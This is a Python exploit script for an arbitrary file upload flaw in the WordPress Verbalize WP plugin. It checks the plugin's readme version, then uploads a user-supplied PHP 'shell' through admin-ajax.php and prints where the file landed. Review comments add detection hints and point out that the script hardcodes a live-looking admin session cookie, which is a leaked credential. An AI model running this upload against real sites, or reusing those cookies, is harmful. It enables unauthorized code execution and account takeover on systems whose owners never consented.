import argparse
import requests
import json
import re
import time
#Exploit By : Nxploit , Khaled Alenazi.
# Silences urllib3's HTTP warnings process-wide, which includes the
# InsecureRequestWarning that would otherwise be raised by the verify=False
# calls below. With verification off, the TLS certificate of the remote host
# is never validated, so responses are not authenticated.
requests.packages.urllib3.disable_warnings()
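def check_vulnerability(url):
    """Report whether the plugin readme advertises an affected version (<= 1.0).

    Fetches ``{url}/wp-content/plugins/verbalize-wp/readme.txt`` and reads the
    ``Stable tag:`` line. The tag is self-reported by a static file that can be
    missing, stale or edited, so a True result means "the readme claims an
    affected version", not that the upload handler is actually reachable.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.

    Returns:
        True when the readme is served with HTTP 200 and its stable tag is
        1.0 or lower, False in every other case.
    """
    readme_url = f"{url}/wp-content/plugins/verbalize-wp/readme.txt"
    # verify=False: the server certificate is not validated. The timeout keeps
    # an unresponsive host from blocking the run indefinitely.
    response = requests.get(readme_url, verify=False, timeout=15)
    if response.status_code == 200:
        # Capture every dotted component. The previous two-component capture
        # read "1.0.1" as 1.0, and float() read "1.10" as 1.1, so later
        # releases were reported as affected.
        match = re.search(r'Stable tag:\s*(\d+(?:\.\d+)*)', response.text)
        if match:
            version = match.group(1)
            components = [int(piece) for piece in version.split(".")]
            # Drop trailing zeros so "1", "1.0" and "1.0.0" compare equal.
            while len(components) > 1 and components[-1] == 0:
                components.pop()
            # [1] is the normalised form of the last affected release, 1.0.
            if components <= [1]:
                print(f"The site is vulnerable. Exploiting version: {version}. Uploading file...")
                return True
    print("The site is not vulnerable or readme.txt not found.")
    return False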
def exploit(url, shell_code):
    """Send the plugin's ``generate_code`` AJAX upload and print the stored path.

    Posts a hand-built multipart body to ``{url}/wp-admin/admin-ajax.php`` with
    ``action=generate_code`` and a ``theFile`` part named ``shell.php`` whose
    content is *shell_code*, then reads the ``html`` field of the JSON reply
    and prints the path assembled from its ``id`` and ``audio`` attributes.

    For defenders, the observable traces in this listing are a POST to
    admin-ajax.php carrying ``action=generate_code`` with a ``.php`` filename,
    and a file appearing under ``/wp-content/uploads/audio-text/<id>/``.
    Denying script execution in the uploads tree limits the impact of such a
    file.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
        shell_code: Text placed in the uploaded file part.

    Returns:
        None. The outcome is only printed.
    """
    boundary = "---------------------------49212111627065537511229032332"

    # NOTE(review): this is a literal, logged-in WordPress session for user
    # "admin" (wordpress_* and wordpress_logged_in_* auth cookies) committed to
    # source. It is a credential: the owning site should invalidate it. Because
    # the request is sent with it, this listing does not by itself show the
    # upload working without an authenticated session.
    cookie_header = "; ".join((
        "wordpress_015fe18cc0e9b211f828d4e47c7733c2=admin%7C1742696436%7CGn8uPLqxYPy06huEfOpU7qZaOx9WBzWjPqB7Pxj2bws%7C18e1fcd93c76fdff695a0bb9acbfad32f47b69a7533d04495fe6da89ac8dcac4",
        "_s_prefix=bdafabda2342343safsafsdfsdfdsfdsf243243243243244d542b31808a0c36a8f2fe15",
        "wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse%26urlbutton%3Dnone%26imgsize%3Dlarge",
        "wp-settings-time-1=1742347909",
        "wordpress_test_cookie=WP%20Cookie%20check",
        "wordpress_logged_in_015fe18cc0e9b211f828d4e47c7733c2=admin%7C1742696436%7CGn8uPLqxYPy06huEfOpU7qZaOx9WBzWjPqB7Pxj2bws%7Cf0898eb2300a854d486d2ac9d76e00ba1aaee44d75a1f7b022a6afa44f6ebc3f",
        "tk_ai=woo%3AnIv17rVYATsfezT88P9%2B7O0a",
        "woocommerce_items_in_cart=1",
        "woocommerce_cart_hash=cfe46a440bc4000907763cdd0a2e179a",
        "wp_woocommerce_session_015fe18cc0e9b211f828d4e47c7733c2=1%7C%7C1742696522%7C%7C1742692922%7C%7Cefd6a88006636ca7dbdd2e2dbd808894",
        "spbc_is_logged_in=419af1fcb162036919daa55721d72ab9",
        "spbc_admin_logged_in=215be1ca89d93b6f45dd940c712a50c9",
        "spbc_secfw_ip_wl=a8eabeb830e7a3f79b75a17025826bdc",
        "__stripe_mid=5d41584d-13d4-4707-905d-15ff007d594bcf4cba",
    ))

    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": f"{url}/wp-admin/admin.php?page=audio-text",
        "X-Requested-With": "XMLHttpRequest",
        # The body is assembled by hand below, so the boundary is declared here
        # rather than left to requests.
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Origin": url,
        "Connection": "keep-alive",
        "Cookie": cookie_header,
        "Priority": "u=0",
    })

    delimiter = f"--{boundary}"

    def _text_part(name, value):
        # One plain form field: delimiter, disposition header, blank line, value.
        return [delimiter, f'Content-Disposition: form-data; name="{name}"', '', value]

    body_lines = _text_part("action", "generate_code")
    # The file part. Both the .php filename and the declared content type are
    # chosen by the client.
    body_lines += [
        delimiter,
        'Content-Disposition: form-data; name="theFile"; filename="shell.php"',
        'Content-Type: application/x-php',
        '',
        shell_code,
    ]
    for field_name, field_value in (
        ("num_val", "1"),
        ("width", "22"),
        ("height", "22"),
        ("btn_val", "speaker"),
        ("btn_color", "red"),
    ):
        body_lines += _text_part(field_name, field_value)
    # Closing delimiter, then an empty entry so the body ends with CRLF.
    body_lines += [f"{delimiter}--", '']
    data = '\r\n'.join(body_lines)

    # verify=False: the server certificate is not validated.
    response = session.post(f"{url}/wp-admin/admin-ajax.php", data=data, verify=False)
    # Raises if the reply is not JSON; the caller does not catch it.
    response_json = json.loads(response.text)
    html_content = response_json.get('html', '')

    id_match = re.search(r'id="(\d+)"', html_content)
    audio_match = re.search(r'audio="([^"]+)"', html_content)
    if not (id_match and audio_match):
        print("Failed to extract shell path")
        return

    shell_id = id_match.group(1)
    shell_name = audio_match.group(1)
    shell_path = f"/wp-content/uploads/audio-text/{shell_id}/{shell_name}"
    print(f"Shell path: {shell_path}")
if __name__ == "__main__":
    # Command-line entry point: -u/--url is required, -s/--shell defaults to a
    # phpinfo() one-liner.
    cli = argparse.ArgumentParser(
        description="WordPress Verbalize WP plugin <= 1.0 - Arbitrary File Upload vulnerability #By: Nxploited ,Khaled Alenazi,"
    )
    cli.add_argument('-u', '--url', required=True, help='Target URL')
    cli.add_argument('-s', '--shell', default="<?php phpinfo(); ?>", help='Shell code to upload')
    options = cli.parse_args()

    target = options.url
    # The upload is attempted only when the readme check reports an affected
    # version; the three-second pause sits between the two requests.
    if check_vulnerability(target):
        time.sleep(3)
        exploit(target, options.shell)
    # NOTE(review): indentation was lost in this listing; the credit line is
    # assumed to print on every run rather than only after an upload attempt.
    print("Exploit By: Nxploit, Khaled ALenazi")